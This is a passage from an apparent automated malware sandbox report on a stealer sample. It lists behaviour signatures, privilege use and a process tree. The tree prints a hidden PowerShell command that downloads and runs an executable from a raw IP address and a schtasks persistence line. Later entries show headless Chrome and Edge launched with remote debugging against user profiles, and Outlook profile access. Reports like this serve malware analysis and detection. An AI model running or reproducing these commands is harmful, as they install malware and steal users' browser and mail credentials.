12564	PING.EXE
6136	PING.EXE
12232	PING.EXE
7944	PING.EXE
11392	PING.EXE
8292	PING.EXE
12572	PING.EXE
9332	PING.EXE
13996	PING.EXE
3772	PING.EXE
7236	PING.EXE
7524	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3056	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4356	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5048	powershell.exe
5048	powershell.exe
5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
3548	rapes.exe
3548	rapes.exe
5088	ibC8xs1.exe
5088	ibC8xs1.exe
5956	exp.exe
5956	exp.exe
5956	exp.exe
5956	exp.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
3772	rapes.exe
3772	rapes.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
4356	MSBuild.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe
3184	DgQBvwg.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
5972	tzutil.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4884	steamerrorreporter.exe
4884	steamerrorreporter.exe
5384	UZPt0hR.exe
5384	UZPt0hR.exe
5384	UZPt0hR.exe
7792	steamerrorreporter.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3956	chrome.exe
3956	chrome.exe
3956	chrome.exe
3956	chrome.exe
3528	msedge.exe
3528	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	5088	ibC8xs1.exe
Token: SeDebugPrivilege	5956	exp.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	4356	MSBuild.exe
Token: SeDebugPrivilege	3184	DgQBvwg.exe
Token: SeDebugPrivilege	664	exp.exe
Token: SeShutdownPrivilege	3728	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3728	msiexec.exe
Token: SeSecurityPrivilege	2864	msiexec.exe
Token: SeCreateTokenPrivilege	3728	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3728	msiexec.exe
Token: SeLockMemoryPrivilege	3728	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3728	msiexec.exe
Token: SeMachineAccountPrivilege	3728	msiexec.exe
Token: SeTcbPrivilege	3728	msiexec.exe
Token: SeSecurityPrivilege	3728	msiexec.exe
Token: SeTakeOwnershipPrivilege	3728	msiexec.exe
Token: SeLoadDriverPrivilege	3728	msiexec.exe
Token: SeSystemProfilePrivilege	3728	msiexec.exe
Token: SeSystemtimePrivilege	3728	msiexec.exe
Token: SeProfSingleProcessPrivilege	3728	msiexec.exe
Token: SeIncBasePriorityPrivilege	3728	msiexec.exe
Token: SeCreatePagefilePrivilege	3728	msiexec.exe
Token: SeCreatePermanentPrivilege	3728	msiexec.exe
Token: SeBackupPrivilege	3728	msiexec.exe
Token: SeRestorePrivilege	3728	msiexec.exe
Token: SeShutdownPrivilege	3728	msiexec.exe
Token: SeDebugPrivilege	3728	msiexec.exe
Token: SeAuditPrivilege	3728	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3728	msiexec.exe
Token: SeChangeNotifyPrivilege	3728	msiexec.exe
Token: SeRemoteShutdownPrivilege	3728	msiexec.exe
Token: SeUndockPrivilege	3728	msiexec.exe
Token: SeSyncAgentPrivilege	3728	msiexec.exe
Token: SeEnableDelegationPrivilege	3728	msiexec.exe
Token: SeManageVolumePrivilege	3728	msiexec.exe
Token: SeImpersonatePrivilege	3728	msiexec.exe
Token: SeCreateGlobalPrivilege	3728	msiexec.exe
Token: SeRestorePrivilege	2864	msiexec.exe
Token: SeTakeOwnershipPrivilege	2864	msiexec.exe
Token: SeRestorePrivilege	2864	msiexec.exe
Token: SeTakeOwnershipPrivilege	2864	msiexec.exe
Token: SeRestorePrivilege	2864	msiexec.exe
Token: SeTakeOwnershipPrivilege	2864	msiexec.exe

Suspicious use of FindShellTrayWindow 20 IoCs

pid	Process
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3060	rundll32.exe
5544	rundll32.exe
4356	MSBuild.exe
3956	chrome.exe
4028	rundll32.exe
3528	msedge.exe
3792	rundll32.exe
2764	rundll32.exe
5980	rundll32.exe
2348	rundll32.exe
13712	rundll32.exe
6636	rundll32.exe
7088	rundll32.exe
5296	rundll32.exe
11932	rundll32.exe
4576	rundll32.exe
11580	rundll32.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4356	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5464 wrote to memory of 2848	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5464 wrote to memory of 2848	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5464 wrote to memory of 2848	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5464 wrote to memory of 3692	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 5464 wrote to memory of 3692	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 5464 wrote to memory of 3692	5464	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2848 wrote to memory of 3056	2848	cmd.exe	89
PID 2848 wrote to memory of 3056	2848	cmd.exe	89
PID 2848 wrote to memory of 3056	2848	cmd.exe	89
PID 3692 wrote to memory of 5048	3692	mshta.exe	92
PID 3692 wrote to memory of 5048	3692	mshta.exe	92
PID 3692 wrote to memory of 5048	3692	mshta.exe	92
PID 5048 wrote to memory of 5092	5048	powershell.exe	100
PID 5048 wrote to memory of 5092	5048	powershell.exe	100
PID 5048 wrote to memory of 5092	5048	powershell.exe	100
PID 5092 wrote to memory of 3548	5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE	102
PID 5092 wrote to memory of 3548	5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE	102
PID 5092 wrote to memory of 3548	5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE	102
PID 3548 wrote to memory of 1016	3548	rapes.exe	105
PID 3548 wrote to memory of 1016	3548	rapes.exe	105
PID 3548 wrote to memory of 1016	3548	rapes.exe	105
PID 1016 wrote to memory of 4008	1016	AfkeY2q.exe	106
PID 1016 wrote to memory of 4008	1016	AfkeY2q.exe	106
PID 1016 wrote to memory of 4008	1016	AfkeY2q.exe	106
PID 3548 wrote to memory of 5088	3548	rapes.exe	111
PID 3548 wrote to memory of 5088	3548	rapes.exe	111
PID 5088 wrote to memory of 2868	5088	ibC8xs1.exe	114
PID 5088 wrote to memory of 2868	5088	ibC8xs1.exe	114
PID 2868 wrote to memory of 2564	2868	csc.exe	116
PID 2868 wrote to memory of 2564	2868	csc.exe	116
PID 5088 wrote to memory of 968	5088	ibC8xs1.exe	117
PID 5088 wrote to memory of 968	5088	ibC8xs1.exe	117
PID 5088 wrote to memory of 968	5088	ibC8xs1.exe	117
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 5088 wrote to memory of 4356	5088	ibC8xs1.exe	118
PID 4548 wrote to memory of 964	4548	cmd.exe	121
PID 4548 wrote to memory of 964	4548	cmd.exe	121
PID 4732 wrote to memory of 5956	4732	explorer.exe	123
PID 4732 wrote to memory of 5956	4732	explorer.exe	123
PID 5956 wrote to memory of 1064	5956	exp.exe	130
PID 5956 wrote to memory of 1064	5956	exp.exe	130
PID 1064 wrote to memory of 2164	1064	csc.exe	132
PID 1064 wrote to memory of 2164	1064	csc.exe	132
PID 5956 wrote to memory of 4016	5956	exp.exe	133
PID 5956 wrote to memory of 4016	5956	exp.exe	133
PID 5956 wrote to memory of 4016	5956	exp.exe	133
PID 5956 wrote to memory of 3412	5956	exp.exe	134
PID 5956 wrote to memory of 3412	5956	exp.exe	134
PID 5956 wrote to memory of 3412	5956	exp.exe	134
PID 5956 wrote to memory of 1756	5956	exp.exe	135
PID 5956 wrote to memory of 1756	5956	exp.exe	135
PID 5956 wrote to memory of 1756	5956	exp.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn kPYo1maAEke /tr "mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn kPYo1maAEke /tr "mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3056
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Users\Admin\AppData\Local\TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
      "C:\Users\Admin\AppData\Local\TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        
        PID:4008
      - C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5088
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pwwwoc5s\pwwwoc5s.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2868
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF01D.tmp" "c:\Users\Admin\AppData\Local\Temp\pwwwoc5s\CSC4027B284692744958D68DA9C18F35FD4.TMP"
        8⤵
        
        PID:2564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Downloads MZ/PE file
        Accesses Microsoft Outlook accounts
        Accesses Microsoft Outlook profiles
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:4356
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3060
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdc8f9dcf8,0x7ffdc8f9dd04,0x7ffdc8f9dd10
        9⤵
        
        PID:5636
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2012 /prefetch:2
        9⤵
        
        PID:5612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2276,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1304 /prefetch:3
        9⤵
        
        PID:5680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2516,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2512 /prefetch:8
        9⤵
        
        PID:5620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3304 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3288,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4100,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4068 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:4288
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4644 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2564
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ffdc884f208,0x7ffdc884f214,0x7ffdc884f220
        9⤵
        
        PID:3248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2268,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
        9⤵
        
        PID:3220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
        9⤵
        
        PID:4860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2684,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:8
        9⤵
        
        PID:384
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2084
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3792
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
